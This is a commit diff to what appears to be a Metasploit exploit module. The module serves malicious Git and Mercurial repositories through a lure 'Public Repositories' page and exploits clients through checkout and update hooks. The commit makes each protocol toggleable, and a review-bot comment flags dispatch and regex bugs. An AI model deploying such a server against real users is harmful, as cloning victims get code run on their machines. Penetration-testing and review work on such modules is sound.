Make git/mercurial support toggle-able, default mercurial to off
parent
574d3624a7
commit
6c8cecf895
|
@ -61,16 +61,16 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('GIT_URI', [true, 'The URI to use as the malicious Git instance', '/git']),
|
||||
OptString.new('MERCURIAL_URI', [true, 'The URI to use as the malicious Git instance', '/hg']),
|
||||
OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty to disable)', '/git']),
|
||||
OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty to disable)', '']),
|
||||
OptString.new('URIPATH', [true, 'The URI to display the malicious repositories in', '/'])
|
||||
]
|
||||
)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('GIT_HOOK', [true, 'The Git hook to use for exploitation', 'post-checkout']),
|
||||
OptString.new('MERCURIAL_HOOK', [true, 'The Mercurial hook to use for exploitation', 'update'])
|
||||
OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),
|
||||
OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update'])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
@ -80,13 +80,16 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
git: { files: {}, trigger: nil },
|
||||
mercurial: { files: {}, trigger: nil }
|
||||
}
|
||||
setup_git
|
||||
setup_mercurial
|
||||
if git_uri.blank? && mercurial_uri.blank?
|
||||
fail ArgumentError, 'Must specify at least one non-blank GIT_URI or MERCURIAL_URI'
|
||||
end
|
||||
setup_git unless git_uri.blank?
|
||||
setup_mercurial unless mercurial_uri.blank?
|
||||
end
|
||||
|
||||
def setup_git
|
||||
# sanity check the malicious URI
|
||||
fail ArgumentError, 'GIT_URI must not be blank' if datastore['GIT_URI'].blank?
|
||||
# URI must start with a /
|
||||
fail ArgumentError, 'GIT_URI must start with a /' unless git_uri =~ /^\//
|
||||
# sanity check the malicious hook:
|
||||
fail ArgumentError, 'GIT_HOOK must not be blank' if datastore['GIT_HOOK'].blank?
|
||||
|
||||
|
@ -153,8 +156,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def setup_mercurial
|
||||
# sanity check the malicious URI
|
||||
fail ArgumentError, 'MERCURIAL_URI must not be blank' if datastore['MERCURIAL_URI'].blank?
|
||||
# URI must start with a /
|
||||
fail ArgumentError, 'MERCURIAL_URI must start with a /' unless mercurial_uri =~ /^\//
|
||||
# sanity check the malicious hook:
|
||||
fail ArgumentError, 'MERCURIAL_HOOK must not be blank' if datastore['MERCURIAL_HOOK'].blank?
|
||||
# TODO: build the fake repository
|
||||
|
@ -175,8 +178,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def primer
|
||||
hardcoded_uripath(datastore['GIT_URI'])
|
||||
hardcoded_uripath(datastore['MERCURIAL_URI'])
|
||||
hardcoded_uripath(git_uri) unless git_uri.blank?
|
||||
hardcoded_uripath(mercurial_uri) unless mercurial_uri.blank?
|
||||
end
|
||||
|
||||
def check_user_agent(cli, req, expected_ua_re = /^.+/)
|
||||
|
@ -198,10 +201,10 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
def on_request_uri(cli, req)
|
||||
if (user_agent = req.headers['User-Agent'])
|
||||
if user_agent =~ /^git\// && req.uri.start_with?(datastore['GIT_URI'])
|
||||
if user_agent =~ /^git\// && req.uri.start_with?(git_uri)
|
||||
do_git(cli, req)
|
||||
return
|
||||
elsif user_agent =~ /^mercurial\// && req.uri.start_with?(datastore['MERCURIAL_URI'])
|
||||
elsif user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri)
|
||||
do_mercurial(cli, req)
|
||||
return
|
||||
end
|
||||
|
@ -213,7 +216,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
def do_git(cli, req)
|
||||
# determine if the requested file is something we know how to serve from our
|
||||
# fake repository and send it if so
|
||||
req_file = URI.parse(req.uri).path.gsub(/^#{datastore['GIT_URI']}/, '')
|
||||
req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
|
||||
if @repo_data[:git][:files].key?(req_file)
|
||||
vprint_status("Sending Git #{req_file}")
|
||||
send_response(cli, @repo_data[:git][:files][req_file])
|
||||
|
@ -232,16 +235,16 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
def do_html(cli, _req)
|
||||
resp = create_response
|
||||
git_uri = URI.parse(get_uri).merge(datastore['GIT_URI'])
|
||||
mercurial_uri = URI.parse(get_uri).merge(datastore['MERCURIAL_URI'])
|
||||
this_git_uri = URI.parse(get_uri).merge(git_uri)
|
||||
this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)
|
||||
resp.body = <<HTML
|
||||
<html>
|
||||
<head><title>Public Repositories</title></head>
|
||||
<body>
|
||||
<p>Here are our public repositories:</p>
|
||||
<ul>
|
||||
<li><a href="#{datastore['GIT_URI']}">Git</a> (clone with `git clone #{git_uri}`)</li>
|
||||
<li><a href="#{datastore['MERCURIAL_URI']}">Mercurial</a> (clone with `hg clone #{mercurial_uri}`)</li>
|
||||
<li><a href="#{git_uri}">Git</a> (clone with `git clone #{this_git_uri}`)</li>
|
||||
<li><a href="#{mercurial_uri}">Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>
|
||||
</ul>
|
||||
</body>
|
||||
</html>
|
||||
|
@ -253,7 +256,7 @@ HTML
|
|||
def do_mercurial(cli, req)
|
||||
# determine if the requested file is something we know how to serve from our
|
||||
# fake repository and send it if so
|
||||
req_file = URI.parse(req.uri).path.gsub(/^#{datastore['MERCURIAL_URI']}/, '')
|
||||
req_file = URI.parse(req.uri).path.gsub(/^#{mercurial_uri}/, '')
|
||||
if @repo_data[:mercurial][:files].key?(req_file)
|
||||
vprint_status("Sending Mercurial #{req_file}")
|
||||
send_response(cli, @repo_data[:mercurial][:files][req_file])
|
||||
|
@ -269,4 +272,12 @@ HTML
|
|||
send_not_found(cli)
|
||||
end
|
||||
end
|
||||
|
||||
def git_uri
|
||||
datastore['GIT_URI']
|
||||
end
|
||||
|
||||
def mercurial_uri
|
||||
datastore['MERCURIAL_URI']
|
||||
end
|
||||
end
|
||||
|
|
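Review bot: In `on_request_uri`, the new `req.uri.start_with?(git_uri)` and `req.uri.start_with?(mercurial_uri)` conditions lack the `blank?` guard this commit adds in `setup` and `primer`. `String#start_with?('')` is true for every string, so with the new empty `MERCURIAL_URI` default the Mercurial branch is selected on User-Agent alone and calls `do_mercurial` for a handler that was never set up. If the datastore returns `nil` for an unset option (not visible here), `start_with?` would raise a `TypeError` instead. Gating each branch, e.g. `if !git_uri.blank? && user_agent =~ /^git\// && req.uri.start_with?(git_uri)`, keeps dispatch consistent with setup. Separately, `do_git` and `do_mercurial` interpolate the option into a pattern unescaped (`/^#{git_uri}/`); `sub(/\A#{Regexp.escape(git_uri)}/, '')` would treat it as a literal prefix. The bodies of these methods continue outside the hunks shown.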